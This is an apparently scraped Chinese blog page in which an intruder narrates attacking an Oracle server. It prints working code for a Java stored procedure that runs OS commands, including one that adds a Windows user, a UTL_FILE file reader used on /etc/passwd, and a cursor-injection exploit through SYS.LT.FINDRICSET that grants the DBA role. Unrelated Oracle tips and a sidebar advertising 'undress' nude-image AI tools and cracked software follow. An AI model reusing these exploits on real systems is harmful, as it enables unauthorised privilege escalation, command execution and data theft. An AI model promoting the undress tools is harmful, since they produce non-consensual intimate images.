很快便连接上Oracle服务器,此时发现: 1.连接后不是dba权限 2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_
很快便连接上Oracle服务器,此时发现:
1.连接后不是dba权限
2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限
3.运行SELECT UTL_HTTP.request(‘’) FROM dual 后发现oracle服务器不能连接网络。
幸运的是,
运行
create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;
成功!这个用户具有create proceduce权限。
此时马上想到创建java扩展执行命令:
create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” “;myReader.close();return str;} catch (Exception e){return e.toString();}}}
begin dbms_java.grant_permission(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘’, ‘execute’ );end;
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ‘LinxUtil.runCMD(java.lang.String) return String’
select * from all_objects where object_name like ‘%LINX%’
grant all on LinxRunCMD to public
select LinxRunCMD(‘cmd /c net user linx /add’) from dual
但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!
还好,我们还有UTL库可以利用:
create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
fHandler UTL_FILE.FILE_TYPE;
buf varchar2(4000);
output varchar2(8000);
BEGIN
fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);
loop
begin
utl_file.get_line(fHandler,buf);
DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);
exception
when no_data_found then exit;
end;
output := output||buf||chr(10);
end loop;
UTL_FILE.FCLOSE(fHandler);
return output;
END;
UTL_FILE_DIR需要先用:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;
指定目。但运行后发现没有权限。只好想办法提权。
***************游标注射***************
老外写了N个pdf介绍这技术,,我精简了代码:
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; begin execute immediate ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);
DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);
BEGIN SYS.LT.FINDRICSET(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);
WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);
END;
运行后重新连接就有dba权限了,简单吧……
现在可以读取文件了:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;
select LinxUTLReadfile(‘passwd’) from dual
后面就简单了,不写了。
oracle怎么查询所有索引May 13, 2022 pm 05:23 PM方法:1、利用“select*from user_indexes where table_name=表名”语句查询表中索引;2、利用“select*from all_indexes where table_name=表名”语句查询所有索引。
什么是oracle asmApr 18, 2022 pm 04:16 PMoracle asm指的是“自动存储管理”,是一种卷管理器,可自动管理磁盘组并提供有效的数据冗余功能;它是做为单独的Oracle实例实施和部署。asm的优势:1、配置简单、可最大化推动数据库合并的存储资源利用;2、支持BIGFILE文件等。
oracle全角怎么转半角May 13, 2022 pm 03:21 PM在oracle中,可以利用“TO_SINGLE_BYTE(String)”将全角转换为半角;“TO_SINGLE_BYTE”函数可以将参数中所有多字节字符都替换为等价的单字节字符,只有当数据库字符集同时包含多字节和单字节字符的时候有效。
Oracle怎么查询端口号May 13, 2022 am 10:10 AM在Oracle中,可利用lsnrctl命令查询端口号,该命令是Oracle的监听命令;在启动、关闭或重启oracle监听器之前可使用该命令检查oracle监听器的状态,语法为“lsnrctl status”,结果PORT后的内容就是端口号。
oracle怎么删除sequenceMay 13, 2022 pm 03:35 PM在oracle中,可以利用“drop sequence sequence名”来删除sequence;sequence是自动增加数字序列的意思,也就是序列号,序列号自动增加不能重置,因此需要利用drop sequence语句来删除序列。
oracle怎么查询数据类型May 13, 2022 pm 04:19 PM在oracle中,可以利用“select ... From all_tab_columns where table_name=upper('表名') AND owner=upper('数据库登录用户名');”语句查询数据库表的数据类型。
oracle查询怎么不区分大小写May 10, 2022 pm 05:45 PM方法:1、利用“LOWER(字段值)”将字段转为小写,或者利用“UPPER(字段值)”将字段转为大写;2、利用“REGEXP_LIKE(字符串,正则表达式,'i')”,当参数设置为“i”时,说明进行匹配不区分大小写。
Oracle怎么修改sessionMay 13, 2022 pm 05:06 PM方法:1、利用“alter system set sessions=修改后的数值 scope=spfile”语句修改session参数;2、修改参数之后利用“shutdown immediate – startup”语句重启服务器即可生效。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
Dreamweaver CS6
Visual web development tools
WebStorm Mac version
Useful JavaScript development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
